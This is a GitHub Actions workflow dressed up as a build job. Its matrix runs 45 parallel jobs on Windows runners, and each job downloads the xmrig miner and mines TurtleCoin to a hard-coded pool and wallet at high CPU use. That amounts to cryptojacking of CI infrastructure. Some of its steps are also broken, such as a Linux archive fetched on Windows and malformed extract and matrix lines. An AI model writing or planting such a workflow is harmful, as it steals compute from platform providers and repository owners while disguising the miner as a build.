name: Ex_code-unmineable
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: Ex-code
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-linux-x64.tar.gz
    - name: Extract
      run: Expand-Archive tar -xf xmrig-6.15.0-linux-x64.tar.gz
    - name: RUNNING
      run: ./xmrig --algo=argon2/chukwav2 -o sg.turtlecoin.herominers.com:1160 -u TRTLuxyDydyX5LPgfgYvZHNYRVoBinUog1X3C8xgCrLoCQnkEAyHVaU3jqR8HZAPZQRE9bmtG4UPyLgsduxY4Q3f9kHRs3xosgr.xmrigA -p x -t 40 --max-cpu-usage 80 --cpu-priority 1 --keepalive
    - name: DONE
      run: exit
